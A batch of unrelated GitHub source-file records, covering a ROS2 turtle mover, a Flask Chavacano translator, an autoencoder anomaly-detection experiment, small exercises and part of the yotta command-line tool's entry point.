{"seq_id":"10329608951","text":"# -*- coding: utf-8 -*-\n\n# This is a Python program that moves the Turtlesim turtle.\n\n\n# Import the libraries\nimport rclpy\nfrom rclpy.node import Node\nfrom geometry_msgs.msg import Twist\nfrom turtlesim.msg import Pose\n\n\nclass MoveTurtle(Node):\n\tdef __init__(self):\n        # Create a node named turtlesim_move\n\t\tsuper().__init__('turtlesim_move')\n        # Create a publisher for the /turtle1/cmd_vel topic, which carries Twist messages\n\t\tself.pub = self.create_publisher(Twist, '/turtle1/cmd_vel', 10)\n        # Register the periodically invoked callback\n\t\tself.tmr = self.create_timer(1.0,self.timer_callback)\n        # Prepare to subscribe to messages from /turtle1/pose\n\t\tself.sub = self.create_subscription(Pose, '/turtle1/pose', self.pose_callback, 10)\n\n    # Callback invoked when the pose message is updated\n\tdef pose_callback(self, msg):\n        # Display the position and orientation\n\t\tself.get_logger().info('(x,y,theta):[%f %f %f]'%(msg.x,msg.y,msg.theta))\n    \n    # Periodically invoked callback\n\tdef timer_callback(self):\n\t\tmsg = Twist()\n        # x component of the linear velocity\n\t\tmsg.linear.x = 1.0\n        # z component of the angular velocity\n\t\tmsg.angular.z = 0.5\n        # Publish the message\n\t\tself.pub.publish(msg)\n\ndef main(args=None):\n\trclpy.init(args=args)\n\tmove=MoveTurtle()\n\trclpy.spin(move)\n\n\nif __name__ == '__main__':\n\tmain()","repo_name":"OhataKazuki/my-program","sub_path":"ROS2/moveTurtle.py","file_name":"moveTurtle.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"41438087050","text":"from flask import * \nimport sqlite3\nfrom flask_socketio import SocketIO, emit, join_room, leave_room\n\n\n\n\n\nconn = sqlite3.connect(\"words.db\")\nc = conn.cursor()\n\napp = Flask(__name__)\nsocketio = SocketIO(app)\n\n\n@socketio.on(\"receiver\")\ndef handle(text):\n    print(text)\n    temptext = text[\"msg\"].split()\n    translatedwords = []\n    \n    for i in temptext:\n        conn = sqlite3.connect(\"words.db\")\n        c = conn.cursor()\n        search = \"SELECT * FROM chavacanowords WHERE filipinoword = ? OR filipinoword = ? OR filipinoword LIKE ? OR filipinoword LIKE ?\"\n        search = \"\"\"SELECT chavacanoword\nFROM (\n    SELECT *, 1 AS exactmatch\n    FROM chavacanowords \n    WHERE filipinoword = ? OR filipinoword = ?\n    UNION ALL\n    SELECT *, 0 AS exactmatch\n    FROM chavacanowords \n    WHERE filipinoword LIKE ? OR filipinoword LIKE ?\n) m\nORDER BY exactmatch DESC\nLIMIT 1\"\"\"\n        \n        c.execute(search, (i, i.title(), '%'+i+'%', '%'+i.title()+'%'))\n        result = c.fetchone()\n        if result:\n            translatedwords.append(result[0])\n        else:\n            translatedwords.append(i)\n    \n    print(temptext)\n    result = ' '.join(translatedwords)\n    print(result)\n    emit('translate', result.lower())\n\n\n@app.route(\"/\")\ndef index():\n    return render_template(\"index.html\")\n\n\n@app.route(\"/translate\")\ndef translate():\n    return render_template(\"translate.html\")\n\nif __name__ == \"__main__\":\n    socketio.run(app, debug = True)","repo_name":"DefinitelyNotAnAssassin/Chavacano_Website","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"33792356478","text":"# Map of class name to Font-Awesome icon\nfrom typing import Dict, Tuple, Union\n\nclass_map: Dict[str, str] = {}\n\n_class_map = {\n    (\"chrome\",\n    \"google-chrome\",\n    \"google-chrome-stable\",\n    \"google-chrome-unstable\",\n    \"chromium\"):\n    \"\\uf268\",\n\n    \"firefox\": \"\\uf269\",\n\n    (\"epiphany\", \"minibrowser\"): \"\\uf267\",\n\n    # yeah, I use all of those\n    # Check the classes with xprop |grep WM_CLASS\n    (\"jetbrains-pychar\",\n    \"jetbrains-pycharm-ce\",\n    \"jetbrains-webstorm\",\n    \"jetbrains-idea\",\n    \"jetbrains-idea-c\",\n    \"jetbrains-idea-ce\",\n    \"jetbrains-clion\",\n    \"jetbrains-studi\",\n    \"jetbrains-phpstorm\",\n    \"jetbrains-studio\", # Android Studio\n    \"emacs\",\n    \"code\",\n    \"qtcreator\"):\n    \"\\uf121\",\n\n    \"gvim\": \"\\uf27d\",\n    \"teamspeak 3\": \"\\uf0c0\",\n    \"steam\": \"\\uf1b6\",\n    \"\": \"\\uf1bc\", # spotify... 
but also some other misbehaving apps that don't\n # set class name or set it too late for bspwm to notice\n (\"dolphin\", \"dolphin4\"): \"\\uf07c\",\n \"thunderbird\": \"\\uf003\",\n \"skype\": \"\\uf17e\",\n (\"gajim\", \"revolt\"): \"\\uf075\",\n \"clementine\": \"\\uf001\",\n (\"gnome-terminal\",\n \"konsole\",\n \"xterm\",\n \"termite\",\n \"terminology\",\n \"urxvt\"):\n \"\\uf120\",\n \"okular\": \"\\uf02d\",\n (\"gimp\",\n \"krita\",\n \"mypaint\"): \"\\uf1fc\",\n \"inkscape\": \"\\uf040\",\n}\n\ndef _expand_to_list(item):\n if isinstance(item, tuple):\n return item\n else:\n return (item, )\n\nfor keys, value in _class_map.items():\n for key in _expand_to_list(keys):\n assert key == \"\" or key.islower()\n class_map[key] = value","repo_name":"ntrrgc/dotfiles","sub_path":"wtfd/wm_class_icons.py","file_name":"wm_class_icons.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"72697631787","text":"import itertools\nimport pickle as pickle\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom tqdm import tqdm\nfrom baetorch.baetorch.evaluation import (\n calc_auroc,\n concat_ood_score,\n evaluate_random_retained_unc,\n evaluate_misclas_detection,\n convert_hard_pred,\n summarise_retained_perf,\n evaluate_retained_unc_v2,\n)\nfrom baetorch.baetorch.lr_range_finder import run_auto_lr_range_v4\nfrom baetorch.baetorch.models_v2.bae_ensemble import BAE_Ensemble\nfrom baetorch.baetorch.models_v2.bae_mcdropout import BAE_MCDropout\nfrom baetorch.baetorch.models_v2.bae_sghmc import BAE_SGHMC\nfrom baetorch.baetorch.models_v2.bae_vi import BAE_VI\nfrom baetorch.baetorch.models_v2.base_layer import flatten_np\nfrom baetorch.baetorch.models_v2.outlier_proba import BAE_Outlier_Proba\nfrom baetorch.baetorch.models_v2.vae import VAE\nfrom baetorch.baetorch.util.convert_dataloader import convert_dataloader\nfrom baetorch.baetorch.util.misc import time_method\nfrom baetorch.baetorch.util.seed import bae_set_seed\nfrom strathclyde_analysis_v2.evaluate_outlier_uncertainty import evaluate_ood_unc\nfrom uncertainty_ood.exceed import calc_exceed\nfrom uncertainty_ood_v2.util.get_predictions import flatten_nll, calc_e_nll\nfrom uncertainty_ood_v2.util.sensor_preproc import (\n MinMaxSensor,\n FFT_Sensor,\n Resample_Sensor,\n)\nfrom uncertainty_ood_v2.util.sensor_preproc import (\n Resample_Sensor_Fourier,\n)\nfrom util.evaluate_ood import evaluate_bce_se\nfrom util.exp_manager import ExperimentManager\nimport os\n\nbae_set_seed(100)\n\n# args for script\ntotal_sensors = 17\npath_data = \"pickles/raw_data.p\"\npickle_path = \"pickles/\"\ndata_raw = pickle.load(open(pickle_path + \"raw_data.p\", \"rb\"))\nnum_cycles = 2205\nsensor_xis = 1\nseq_xis = 2\n\n# exp name and filenames\nexp_name = \"ZEMA_HYD_SS10\"\nauroc_filename = exp_name + \"AUROC.csv\"\nbce_se_filename = exp_name + \"BCE_VS_SE.csv\"\nretained_perf_filename = exp_name + \"retained_perf.csv\"\nmisclas_perf_filename = exp_name + \"misclas_perf.csv\"\nsensor_auroc_filename = exp_name + \"sensors_auroc.csv\"\nood_level_auroc_filename = exp_name + \"level_auroc.csv\"\n\napply_fft = False\n\n# whether to evaluate OOD uncertainty\neval_ood_unc = False\nif eval_ood_unc:\n pickle_files = [\n auroc_filename,\n bce_se_filename,\n retained_perf_filename,\n misclas_perf_filename,\n sensor_auroc_filename,\n ]\nelse:\n pickle_files = [auroc_filename, bce_se_filename, sensor_auroc_filename]\n\n# Loop over all grid search 
combinations\n# fmt: off\nn_random_seeds = 1\nrandom_seeds = np.random.randint(0, 1000, n_random_seeds)\nfull_likelihood = [\"mse\", \"homo-gauss\", \"hetero-gauss\", \"homo-tgauss\", \"hetero-tgauss\", \"bernoulli\", \"cbernoulli\",\n \"beta\"]\nhomoscedestic_mode_map = {\"bernoulli\": \"none\", \"cbernoulli\": \"none\", \"homo-gauss\": \"every\", \"hetero-gauss\": \"none\",\n \"homo-tgauss\": \"none\", \"hetero-tgauss\": \"none\", \"mse\": \"none\", \"beta\": \"none\"}\nlikelihood_map = {\"bernoulli\": \"bernoulli\", \"cbernoulli\": \"cbernoulli\", \"homo-gauss\": \"gaussian\",\n \"hetero-gauss\": \"gaussian\", \"homo-tgauss\": \"truncated_gaussian\",\n \"hetero-tgauss\": \"truncated_gaussian\", \"mse\": \"gaussian\", \"beta\": \"beta\"}\ntwin_output_map = {\"bernoulli\": False, \"cbernoulli\": False, \"homo-gauss\": False, \"hetero-gauss\": True,\n \"homo-tgauss\": False, \"hetero-tgauss\": True, \"mse\": False, \"beta\": True}\n# fmt: on\n\nbae_type_classes = {\n \"ens\": BAE_Ensemble,\n \"mcd\": BAE_MCDropout,\n \"sghmc\": BAE_SGHMC,\n \"vi\": BAE_VI,\n \"vae\": VAE,\n \"ae\": BAE_Ensemble,\n}\n\nn_bae_samples_map = {\n \"ens\": 5,\n \"mcd\": 100,\n \"sghmc\": 100,\n \"vi\": 100,\n \"vae\": 100,\n \"ae\": 1,\n}\n\n# grid = {\n# \"random_seed\": random_seeds,\n# \"apply_fft\": [apply_fft],\n# # \"ss_id\": [\n# # *np.arange(total_sensors).astype(int),\n# # list(np.arange(total_sensors).astype(int)),\n# # ],\n# \"ss_id\": [0],\n# \"target_dim\": [0, 1, 2, 3],\n# \"resample_factor\": [60],\n# \"skip\": [False, True],\n# \"latent_factor\": [0.5],\n# \"bae_type\": [\"ae\", \"ens\"],\n# \"full_likelihood\": [\"mse\"],\n# }\n\n# grid = {\n# \"random_seed\": [1],\n# \"apply_fft\": [apply_fft],\n# # \"ss_id\": [\n# # *np.arange(total_sensors).astype(int),\n# # list(np.arange(total_sensors).astype(int)),\n# # ],\n# \"ss_id\": list(range(17)) + [list(range(17))],\n# \"target_dim\": [0],\n# \"resample_factor\": [60],\n# \"skip\": [False],\n# \"latent_factor\": [0.5],\n# \"bae_type\": [\"ae\"],\n# \"full_likelihood\": [\"mse\"],\n# }\n\n# grid = {\n# \"random_seed\": random_seeds,\n# \"apply_fft\": [apply_fft],\n# \"ss_id\": [-1],\n# \"target_dim\": [0],\n# \"resample_factor\": [562],\n# \"skip\": [True],\n# \"latent_factor\": [0.5],\n# \"bae_type\": [\"ae\"],\n# \"full_likelihood\": [\"mse\"],\n# }\n\n# GRID SELECT SENSORS\ngrid = {\n \"random_seed\": random_seeds,\n \"apply_fft\": [apply_fft],\n \"ss_id\": [12],\n \"target_dim\": [0],\n \"resample_factor\": [60],\n \"skip\": [False],\n \"latent_factor\": [0.5],\n \"bae_type\": [\"ens\"],\n # \"full_likelihood\": [\"mse\"],\n \"full_likelihood\": [\"hetero-gauss\"],\n # \"full_likelihood\": [\"homo-gauss\"],\n}\ntarget_dim_ssid = [12, 12, 5, 12]\n\nfor values in tqdm(itertools.product(*grid.values())):\n # setup the grid\n exp_params = dict(zip(grid.keys(), values))\n print(exp_params)\n\n # unpack exp params\n random_seed = exp_params[\"random_seed\"]\n apply_fft = exp_params[\"apply_fft\"]\n sensor_i = exp_params[\"ss_id\"]\n target_dim = exp_params[\"target_dim\"]\n resample_factor = exp_params[\"resample_factor\"]\n skip = exp_params[\"skip\"]\n latent_factor = exp_params[\"latent_factor\"]\n bae_type = exp_params[\"bae_type\"]\n full_likelihood_i = exp_params[\"full_likelihood\"]\n twin_output = twin_output_map[full_likelihood_i]\n homoscedestic_mode = homoscedestic_mode_map[full_likelihood_i]\n likelihood = likelihood_map[full_likelihood_i]\n n_bae_samples = n_bae_samples_map[bae_type]\n\n # conditional ss_id (-1) on target_dim\n if sensor_i 
== -1:\n sensor_i = target_dim_ssid[target_dim]\n exp_params.update({\"ss_id\": sensor_i})\n\n # Apply Resample here\n # use encode/load pickle of the resampled x data\n if not os.path.exists(os.path.join(\"x_resampled\", \"pickles\")):\n os.mkdir(os.path.join(\"x_resampled\", \"pickles\"))\n\n resample_maps = {\n \"Hz_1\": {\"n\": 1, \"mode\": \"up\"},\n \"Hz_10\": {\"n\": 10, \"mode\": \"down\"},\n \"Hz_100\": {\"n\": 100, \"mode\": \"down\"},\n }\n\n exp_man = ExperimentManager(folder_name=\"x_resampled\")\n pickle_x_rs = exp_man.encode({\"resample\": resample_factor})\n if pickle_x_rs not in os.listdir(os.path.join(\"x_resampled\", \"pickles\")):\n x_resampled = None\n for id_, key in enumerate([\"Hz_1\", \"Hz_10\", \"Hz_100\"]):\n if apply_fft:\n x_temp = FFT_Sensor().transform(data_raw[key])\n else:\n x_temp = np.copy(data_raw[key])\n x_resampled_ = Resample_Sensor_Fourier().transform(\n x_temp, seq_len=resample_factor, seq_axis=seq_xis\n )\n # x_resampled_ = Resample_Sensor().transform(\n # x_temp,\n # n=resample_maps[key][\"n\"],\n # seq_axis=seq_xis,\n # mode=resample_maps[key][\"mode\"],\n # )\n if id_ == 0:\n x_resampled = x_resampled_\n else:\n x_resampled = np.concatenate(\n (x_resampled, x_resampled_), axis=sensor_xis\n )\n exp_man.encode_pickle(pickle_x_rs, data=x_resampled)\n else:\n x_resampled = exp_man.load_encoded_pickle(pickle_x_rs)\n\n # select sensors\n if isinstance(sensor_i, int):\n x_resampled_select = x_resampled[:, [sensor_i]]\n else:\n x_resampled_select = x_resampled[:, sensor_i]\n y_target = np.copy(data_raw[\"target\"])\n\n # split inliers and outliers\n # get the y_arg_ood where only target dim is faulty,\n # and all other dims are healthy\n\n y_arg_ood = np.argwhere(\n (y_target[:, target_dim] > 0)\n & (y_target[:, [i for i in range(4) if i != target_dim]].sum(1) == 0)\n )[:, 0]\n x_inliers = x_resampled_select[np.argwhere(y_target[:, target_dim] == 0)[:, 0]]\n x_outliers = x_resampled_select[y_arg_ood]\n\n x_id_train, x_id_test = train_test_split(\n x_inliers, random_state=random_seed, shuffle=True, train_size=0.70\n )\n x_ood_test = x_outliers\n\n # === MIN MAX SCALER ===\n min_max_clip = True\n sensor_scaler = MinMaxSensor(\n num_sensors=x_id_train.shape[1], axis=1, clip=min_max_clip\n )\n x_id_train = sensor_scaler.fit_transform(x_id_train)\n x_id_test = sensor_scaler.transform(x_id_test)\n x_ood_test = sensor_scaler.transform(x_ood_test)\n\n # ===============FIT BAE===============\n use_cuda = True\n weight_decay = 0.00000000001\n anchored = True if bae_type == \"ens\" else False\n bias = False\n se_block = False\n norm = \"none\"\n self_att = False\n self_att_transpose_only = False\n num_epochs = 100\n activation = \"leakyrelu\"\n lr = 0.001\n\n input_dim = x_id_train.shape[-1]\n latent_dim = int(np.product(x_id_train.shape[1:]) * latent_factor)\n\n chain_params = [\n {\n \"base\": \"conv1d\",\n \"input_dim\": input_dim,\n \"conv_channels\": [x_id_train.shape[1], 10, 20],\n \"conv_stride\": [2, 2],\n \"conv_kernel\": [5, 2],\n \"activation\": activation,\n \"norm\": norm,\n \"se_block\": se_block,\n \"order\": [\"base\", \"norm\", \"activation\"],\n \"bias\": bias,\n \"last_norm\": norm,\n },\n {\n \"base\": \"linear\",\n # \"architecture\": [latent_dim, latent_dim // 2],\n # \"architecture\": [500, latent_dim],\n \"architecture\": [250, latent_dim],\n \"activation\": activation,\n \"norm\": norm,\n \"last_norm\": norm,\n },\n ]\n\n bae_model = bae_type_classes[bae_type](\n chain_params=chain_params,\n last_activation=\"sigmoid\",\n last_norm=norm,\n 
twin_output=twin_output,\n twin_params={\"activation\": \"selu\", \"norm\": \"none\"},\n skip=skip,\n use_cuda=use_cuda,\n scaler_enabled=False,\n homoscedestic_mode=homoscedestic_mode,\n likelihood=likelihood,\n weight_decay=weight_decay,\n num_samples=n_bae_samples,\n anchored=anchored,\n learning_rate=lr,\n stochastic_seed=random_seed,\n )\n\n x_id_train_loader = convert_dataloader(\n x_id_train, batch_size=len(x_id_train) // 5, shuffle=True, drop_last=True\n )\n\n min_lr, max_lr, half_iter = run_auto_lr_range_v4(\n x_id_train_loader,\n bae_model,\n window_size=1,\n num_epochs=10,\n run_full=False,\n plot=False,\n verbose=False,\n save_mecha=\"copy\" if bae_type == \"vae\" else \"file\",\n )\n\n if isinstance(bae_model, BAE_SGHMC):\n bae_model.fit(\n x_id_train_loader,\n burn_epoch=int(num_epochs * 2 / 3),\n sghmc_epoch=num_epochs // 3,\n clear_sghmc_params=True,\n )\n else:\n time_method(bae_model.fit, x_id_train_loader, num_epochs=num_epochs)\n\n # === PREDICTIONS ===\n exp_man = ExperimentManager(folder_name=\"experiments\")\n\n # predict and evaluate\n (bae_id_pred, bae_ood_pred), (\n (eval_auroc, retained_res_all, misclas_res_all)\n ) = evaluate_ood_unc(\n bae_model=bae_model,\n x_id_train=x_id_train,\n x_id_test=x_id_test,\n x_ood_test=x_ood_test,\n exp_name=exp_name,\n exp_params=exp_params,\n eval_ood_unc=eval_ood_unc,\n exp_man=exp_man,\n ret_flatten_nll=False,\n )\n\n # eval per sensor\n nll_key = \"nll\"\n sensor_aurocs_ = {}\n for i in range(x_inliers.shape[sensor_xis]):\n e_nll_id_ = flatten_nll(bae_id_pred[nll_key].mean(0)[:, [i]])\n e_nll_ood_ = flatten_nll(bae_ood_pred[nll_key].mean(0)[:, [i]])\n\n sensor_aurocs_.update({str(i): calc_auroc(e_nll_id_, e_nll_ood_)})\n\n # save eval per sensor\n pickle_sensor_auroc = exp_man.encode(exp_params)\n exp_man.update_csv(\n exp_params,\n insert_pickle=pickle_sensor_auroc,\n csv_name=sensor_auroc_filename,\n )\n exp_man.encode_pickle(pickle_sensor_auroc, data=sensor_aurocs_)\n\n print(eval_auroc)\n\n # eval per level of ood\n e_nll_id = flatten_nll(bae_id_pred[nll_key]).mean(0)\n e_nll_ood = flatten_nll(bae_ood_pred[nll_key]).mean(0)\n v_nll_id = flatten_nll(bae_id_pred[nll_key]).var(0)\n v_nll_ood = flatten_nll(bae_ood_pred[nll_key]).var(0)\n\n y_ood_levels = np.unique(y_target[y_arg_ood, target_dim]).astype(int)\n for level in y_ood_levels:\n e_ood_level = e_nll_ood[\n np.argwhere(y_target[y_arg_ood, target_dim] == level)[:, 0]\n ]\n v_ood_level = v_nll_ood[\n np.argwhere(y_target[y_arg_ood, target_dim] == level)[:, 0]\n ]\n auroc_levels = {\n \"OOD_LEVEL\": level,\n \"E_AUROC\": calc_auroc(e_nll_id, e_ood_level),\n \"V_AUROC\": calc_auroc(v_nll_id, v_ood_level),\n }\n exp_man.update_csv(\n exp_man.concat_params_res(exp_params, auroc_levels),\n csv_name=ood_level_auroc_filename,\n )\n print(auroc_levels)\n\n\n# CALCULATE OUTLIER PROBA\n\nbae_id_pred_y_mu = bae_model.predict(x_id_test, select_keys=[\"y_mu\"])[\"y_mu\"]\nbae_ood_pred_y_mu = bae_model.predict(x_ood_test, select_keys=[\"y_mu\"])[\"y_mu\"]\n\nbae_id_pred_y_sigma = np.sqrt(\n bae_model.predict(x_id_test, select_keys=[\"y_sigma\"])[\"y_sigma\"]\n)\nbae_ood_pred_y_sigma = np.sqrt(\n bae_model.predict(x_ood_test, select_keys=[\"y_sigma\"])[\"y_sigma\"]\n)\n\n\n# bae_id_pred_y_mu[0]\n# convert to outlier proba\n\nfrom scipy.special import erf\nfrom scipy.stats import norm\nimport matplotlib.pyplot as plt\n\n\ndef cdf_normal(x, mu, sigma=1, scale=True):\n res = norm.cdf(x, loc=mu, scale=sigma)\n\n if scale:\n # pc_wise\n res = np.piecewise(\n res,\n [\n x - mu < 0,\n x - mu 
>= 0,\n ],\n [lambda x_: (1 - x_ - 0.5) * 2, lambda x_: (x_ - 0.5) * 2],\n )\n\n return res\n\n\n# cdf_res = cdf_normal(\n# x=flatten_np(x_id_test)[:, :-1],\n# mu=flatten_np(bae_id_pred_y_mu[0])[:, :-1],\n# sigma=flatten_np(bae_id_pred_y_sigma[0])[:, :-1],\n# )\n#\n# cdf_id_res = cdf_normal(\n# x=flatten_np(x_id_test)[:, :-1],\n# mu=flatten_np(bae_id_pred_y_mu[0])[:, :-1],\n# sigma=flatten_np(bae_id_pred_y_sigma[0])[:, :-1],\n# )\n#\n# cdf_ood_res = cdf_normal(\n# x=flatten_np(x_ood_test)[:, :-1],\n# mu=flatten_np(bae_ood_pred_y_mu[0])[:, :-1],\n# sigma=flatten_np(bae_ood_pred_y_sigma[0])[:, :-1],\n# )\n#\n\ndef calc_ood_proba(x_test, bae_model):\n bae_pred = bae_model.predict(x_test, select_keys=[\"y_mu\", \"y_sigma\"])\n bae_pred_y_mu = bae_pred[\"y_mu\"]\n\n if bae_model.likelihood == \"gaussian\" and bae_model.homoscedestic_mode ==\"none\" and bae_model.twin_output==False:\n bae_pred_y_sigma = 1\n homo_gauss = True\n else:\n bae_pred_y_sigma = np.sqrt(bae_pred[\"y_sigma\"])\n homo_gauss = False\n return np.array(\n [\n cdf_normal(\n x=flatten_np(x_test)[:, :-1],\n mu=flatten_np(bae_pred_y_mu[i])[:, :-1],\n sigma=flatten_np(bae_pred_y_sigma[i])[:, :-1] if not homo_gauss else bae_pred_y_sigma,\n # sigma=bae_pred_y_sigma[i][:-1]\n )\n for i in range(bae_model.num_samples)\n ]\n )\n\n\n# y_id_proba = calc_ood_proba(x_id_test, bae_model).prod(-1)\n# y_ood_proba = calc_ood_proba(x_ood_test, bae_model).prod(-1)\ny_id_proba = calc_ood_proba(x_id_test, bae_model).mean(-1)\ny_ood_proba = calc_ood_proba(x_ood_test, bae_model).mean(-1)\n\ndef calc_unc_probas(y_probas):\n epi = y_probas.var(0)\n alea = (y_probas*(1-y_probas)).mean(0)\n total = epi+alea\n unc_probas = {\"epi\":epi, \"alea\":alea, \"total\":total}\n return unc_probas\n\n\n# unc_id_level = cdf_id_res.mean(-1) * (1 - cdf_id_res.mean(-1)) * 4\n# unc_ood_level = cdf_ood_res.mean(-1) * (1 - cdf_ood_res.mean(-1)) * 4\n\n# unc_type = \"total\"\nunc_type = \"epi\"\nunc_id_level = calc_unc_probas(y_id_proba)[unc_type]*4\nunc_ood_level = calc_unc_probas(y_ood_proba)[unc_type]*4\n\nall_aurocs = []\nall_perc = []\nfor unique_ in np.unique(np.concatenate((unc_id_level, unc_ood_level))):\n# for unique_ in np.histogram(np.unique(np.concatenate((unc_id_level, unc_ood_level))), bins=50)[1]:\n# for unique_ in np.unique(np.concatenate((unc_id_level, unc_ood_level)).round(3)):\n retained_id_arg = np.argwhere(unc_id_level <= unique_)[:, 0]\n retained_ood_arg = np.argwhere(unc_ood_level <= unique_)[:, 0]\n\n if len(retained_id_arg) >= 3 and len(retained_ood_arg) >= 3:\n aurc_ = calc_auroc(e_nll_id[retained_id_arg], e_nll_ood[retained_ood_arg])\n all_aurocs.append(aurc_)\n all_perc.append(\n (len(retained_id_arg) + len(retained_ood_arg))\n / (len(e_nll_id) + len(e_nll_ood))\n )\n\nplt.figure()\nplt.plot(all_perc, all_aurocs)\n\n\n\n# predict and evaluate\n(bae_id_pred, bae_ood_pred), (\n (eval_auroc, retained_res_all, misclas_res_all)\n) = evaluate_ood_unc(\n bae_model=bae_model,\n x_id_train=x_id_train,\n x_id_test=x_id_test,\n x_ood_test=x_ood_test,\n exp_name=exp_name,\n exp_params=exp_params,\n eval_ood_unc=True,\n exp_man=exp_man,\n ret_flatten_nll=False,\n norm_scalings=[False],\n cdf_dists=[\"norm\"],\n)\n\n(bae_id_pred, bae_ood_pred), (\n (eval_auroc, retained_res_all, misclas_res_all)\n) = evaluate_ood_unc(\n bae_model=bae_model,\n x_id_train=x_id_train,\n x_id_test=x_id_test,\n x_ood_test=x_ood_test,\n exp_name=exp_name,\n exp_params=exp_params,\n eval_ood_unc=True,\n exp_man=exp_man,\n ret_flatten_nll=False,\n norm_scalings=[True],\n 
cdf_dists=[\"norm\"],\n)\n\nplt.figure()\nplt.plot(\n retained_res_all[\"varnll\"][\"valid_perc\"],\n retained_res_all[\"varnll\"][\"auroc\"],\n)\n\nplt.figure()\nplt.plot(\n retained_res_all[\"proba-total\"][\"valid_perc\"],\n retained_res_all[\"proba-total\"][\"auroc\"],\n)\n","repo_name":"bangxiangyong/bae-anomaly-uncertainty","sub_path":"zema_hydraulic/05-Outlier-proba.py","file_name":"05-Outlier-proba.py","file_ext":"py","file_size_in_byte":18200,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"12185730567","text":"\"\"\"\n 2022/12/10 author:WH\n\"\"\"\n\nclass Solution:\n def countBits(self, n):\n i = 0\n ans = []\n while i < n+1:\n ans.append(self.CountNum(i))\n i += 1\n return ans\n\n\n def CountNum(self, num):\n res = 0\n while num:\n num &= (num-1)\n res += 1\n return res\n\nif __name__ == \"__main__\":\n n = 5\n result = Solution().countBits(n)\n print(result)","repo_name":"Sirwenhao/Leetcode_solution","sub_path":"Python_Solution/easy/leetcode_0388.py","file_name":"leetcode_0388.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"43132052618","text":"#!/usr/bin/python3\n\"\"\"\nThis module has one function that sum of an integer or float as an interger\n\"\"\"\n\n\ndef add_integer(a, b=98):\n \"\"\"\n Return the sum of an integer or float as an interger\n\n Args:\n a: int or float\n b: int or float\n\n Return:\n Sum of the two arguments as an integer\n\n Raises:\n TypeError: if arg a or arg b is not an integer or a float\n \"\"\"\n if isinstance(a, int) != True and isinstance(a, float) != True:\n raise TypeError(\"a must be an integer\")\n\n if isinstance(b, int) != True and isinstance(b, float) != True:\n raise TypeError(\"b must be an integer\")\n\n return int(a) + int(b)\n","repo_name":"AbdulRaufAl-hassan101010/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/0-add_integer.py","file_name":"0-add_integer.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41309163427","text":"import time\nimport ntplib\nt = (2018, 3, 11, 19, 3, 38, 1, 48, 0)\nc = ntplib.NTPClient()\nresponse = c.request('time4.google.com', version=3) \nsecs = response.tx_time\nprint(\"de ntp\", response.tx_time)\nprint(\"de time clock\", time.clock())\nfor i in range(10):\n print (\"time.mktime(t) : \", secs)\n tempTime=time.asctime(time.localtime(secs+time.clock()))\n print (\"asctime(localtime(secs)): %s\" % tempTime[0:4]+tempTime[8:10]+\"/\"+tempTime[4:6]+\"/\"+tempTime[20:24], tempTime[11:19])\n time.sleep(1)","repo_name":"SeekingAura/distribuidosUTP","sub_path":"taller 7/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23657273072","text":"from yotta.lib import lazyregex #pylint: disable=unused-import\nfrom yotta.lib import errors #pylint: disable=unused-import\n\n# NOTE: argcomplete must be first!\n# argcomplete, pip install argcomplete, tab-completion for argparse, Apache-2\nimport argcomplete\n\n# standard library modules, , ,\nimport argparse\nimport sys\nimport os\n\n# globalconf, share global arguments between modules, internal\nimport yotta.lib.globalconf as globalconf\n\n# hook to support coverage information when yotta runs itself during tests:\nif 'COVERAGE_PROCESS_START' 
in os.environ:\n import coverage\n coverage.process_startup()\n\n# set __version__ using the same file that's read by setup.py when installing:\nwith open(os.path.join(os.path.dirname(__file__), 'version.txt')) as _version_f:\n __version__ = _version_f.read().strip()\n\ndef splitList(l, at_value):\n r = [[]]\n for x in l:\n if x == at_value:\n r.append(list())\n else:\n r[-1].append(x)\n return r\n\ndef _handleUnhandledReqestExceptions(fn):\n import functools\n @functools.wraps(fn)\n def wrapped(*args, **kwargs):\n # requests, apache2\n import requests\n try:\n return fn(*args, **kwargs)\n except requests.exceptions.RequestException as e:\n import logging\n if e.request is not None:\n logging.critical('%s %s failed with status %s', e.request.method, e.request.url, e.response.status_code)\n sys.exit(1)\n else:\n raise\n return wrapped\n\ndef _exitSilentlyOnUnhandledPipeError(fn):\n import functools\n @functools.wraps(fn)\n def wrapped(*args, **kwargs):\n try:\n return fn(*args, **kwargs)\n except IOError as e:\n import errno\n if e.errno == errno.EPIPE:\n # unhandled pipe error -> exit silently, but with an error code\n sys.exit(1)\n else:\n raise\n return wrapped\n\n@_exitSilentlyOnUnhandledPipeError\n@_handleUnhandledReqestExceptions\ndef main():\n # standard library modules, , ,\n import logging\n from functools import reduce\n\n # logging setup, , setup the logging system, internal\n from yotta.lib import logging_setup\n # options, , common argument parser options, internal\n import yotta.options as options\n\n logging_setup.init(level=logging.INFO, enable_subsystems=None, plain=False)\n\n # we override many argparse things to make options more re-usable across\n # subcommands, and allow lazy loading of subcommand modules:\n parser = options.parser.ArgumentParser(\n formatter_class=argparse.RawTextHelpFormatter,\n description='Build software using re-usable components.\\n'+\n 'For more detailed help on each subcommand, run: yotta --help'\n )\n subparser = parser.add_subparsers(dest='subcommand_name', metavar='')\n\n parser.add_argument('--version', action='version', version=__version__,\n help='display the version'\n )\n\n # add re-usable top-level options which subcommands may also accept\n options.verbosity.addTo(parser)\n options.debug.addTo(parser)\n options.plain.addTo(parser)\n options.noninteractive.addTo(parser)\n options.registry.addTo(parser)\n options.target.addTo(parser)\n options.config.addTo(parser)\n\n def addParser(name, module_name, description, help=None):\n if help is None:\n help = description\n def 